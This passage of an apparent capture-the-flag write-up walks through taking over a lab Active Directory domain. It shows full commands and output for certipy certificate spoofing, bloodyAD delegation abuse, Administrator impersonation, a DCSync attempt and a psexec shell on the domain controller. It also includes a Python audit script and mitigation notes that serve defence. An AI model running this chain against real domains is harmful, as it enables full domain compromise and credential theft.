Use that machine account to request the domain controller's machine certificate from the AD CS server:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad req -u EVILCOMPUTER2\$@xiaorang.lab -p '123@#ABC' -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with DNS Host Name 'XR-DC01.xiaorang.lab'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'xr-dc01.pfx'
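Two things in the directory give this step away before any certificate is issued: a computer object whose dNSHostName does not match its own sAMAccountName (EVILCOMPUTER2$ claiming XR-DC01.xiaorang.lab), and a machine account that an ordinary user was able to create at all, which the default ms-DS-MachineAccountQuota of 10 permits and which AD records in mS-DS-CreatorSID. The "Certificate has no object SID" line above is the other half of the story: the KB5014754 fix adds a SID extension to the certificate so the KDC no longer maps a certificate to an account by dNSHostName alone. The block below is an added example, not code from the writeup or from certipy, that runs those directory checks over a constructed LDAP snapshot modelled on the accounts in this exercise; the creator SID is a labelled placeholder.

```python
from collections import defaultdict

SERVER_TRUST_ACCOUNT = 0x2000       # userAccountControl bit set on domain controllers
WORKSTATION_TRUST_ACCOUNT = 0x1000  # the 4096 certipy printed when creating the account
DOMAIN = "xiaorang.lab"

# Constructed snapshot of computer objects (not a real export). The creator SID is a
# placeholder standing in for the unprivileged user that created the account.
CREATOR_PLACEHOLDER = "S-1-5-21-3745972894-1678056601-2622918667-1105"
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "XR-DC01$",       "dNSHostName": "XR-DC01.xiaorang.lab", "userAccountControl": 0x82000, "mS-DS-CreatorSID": None},
    {"sAMAccountName": "XR-CA$",         "dNSHostName": "XR-CA.xiaorang.lab",   "userAccountControl": 0x1000,  "mS-DS-CreatorSID": None},
    {"sAMAccountName": "XR-0687$",       "dNSHostName": "XR-0687.xiaorang.lab", "userAccountControl": 0x1000,  "mS-DS-CreatorSID": None},
    {"sAMAccountName": "EVILCOMPUTER2$", "dNSHostName": "XR-DC01.xiaorang.lab", "userAccountControl": 0x1000,  "mS-DS-CreatorSID": CREATOR_PLACEHOLDER},
]


def expected_dns_name(sam, domain=DOMAIN):
    """The dNSHostName a computer account should carry: its name without '$' plus the domain."""
    return "%s.%s" % (sam.rstrip("$"), domain)


def audit_computers(computers, domain=DOMAIN):
    """Return (account, issue) pairs for: accounts created through the machine account quota,
    dNSHostName values that do not match the account name, names that collide with a
    domain controller, and any dNSHostName shared by more than one object."""
    findings = []
    dc_names = {c["dNSHostName"].lower(): c["sAMAccountName"] for c in computers
                if c["userAccountControl"] & SERVER_TRUST_ACCOUNT and c["dNSHostName"]}
    owners = defaultdict(list)
    for c in computers:
        sam, dns = c["sAMAccountName"], c["dNSHostName"]
        if c.get("mS-DS-CreatorSID"):
            findings.append((sam, "created via ms-DS-MachineAccountQuota by %s" % c["mS-DS-CreatorSID"]))
        if not dns:
            continue
        key = dns.lower()
        owners[key].append(sam)
        if key != expected_dns_name(sam, domain).lower():
            findings.append((sam, "dNSHostName %s does not match sAMAccountName" % dns))
        if key in dc_names and dc_names[key] != sam:
            findings.append((sam, "dNSHostName collides with domain controller %s" % dc_names[key]))
    for key, sams in owners.items():
        if len(sams) > 1:
            findings.append((",".join(sorted(sams)), "duplicate dNSHostName %s" % key))
    return findings


if __name__ == "__main__":
    for account, issue in audit_computers(SAMPLE_COMPUTERS):
        print("%-16s %s" % (account, issue))
```

On a patched forest the mismatch check should come back empty for new objects, because the DC now validates dNSHostName against the account on write; the creator-SID check stays useful regardless, and setting ms-DS-MachineAccountQuota to 0 removes the precondition for both this step and the earlier impacket-addcomputer one.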

Use the certificate obtained to request a TGT as the domain controller:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: xr-dc01$@xiaorang.lab
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Requesting the TGT with certipy fails with KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type).

Authenticate with the certificate via bloodyAD instead and configure RBCD for the attack:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad cert -pfx xr-dc01.pfx > xr-dc01.pem
Certipy v4.8.2 - by Oliver Lyak (ly4k)
┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodyAD -d xiaorang.lab -u 'EVILCOMPUTER2$' -c ':xr-dc01.pem' --host 172.22.15.13 --secure add rbcd 'xr-dc01$' 'EVILCOMPUTER2$'
[!] No security descriptor has been returned, a new one will be created
[+] EVILCOMPUTER2$ can now impersonate users on xr-dc01$ via S4U2Proxy

Request a service ticket impersonating the domain admin:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-getST 'xiaorang.lab/EVILCOMPUTER2$:123@#ABC' -spn LDAP/xr-dc01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@LDAP_xr-dc01.xiaorang.lab@XIAORANG.LAB.ccache
┌──(root㉿kali)-[~/Desktop/tmp]
└─# export KRB5CCNAME=Administrator@LDAP_xr-dc01.xiaorang.lab@XIAORANG.LAB.ccache

DCSync to dump credentials from the domain controller:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-secretsdump 'xiaorang.lab/administrator@XR-DC01.xiaorang.lab' -target-ip 172.22.15.13 -no-pass -k -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

Log in to the domain controller (PTH):

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec 'xiaorang.lab/administrator@XR-DC01.xiaorang.lab' -target-ip 172.22.15.13 -codec gbk -no-pass -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 172.22.15.13.....
[*] Found writable share ADMIN$
[*] Uploading file FavsxEaA.exe
[*] Opening SVCManager on 172.22.15.13.....
[*] Creating service fjnA on 172.22.15.13.....
[*] Starting service fjnA.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。

C:\windows\system32>

The flag is under C:\Users\Administrator\flag

References

https://h0ny.github.io/posts/2022%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%9B%98-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/#as-rep-roasting

https://x1nri.github.io/2025/01/24/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-2022%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3/
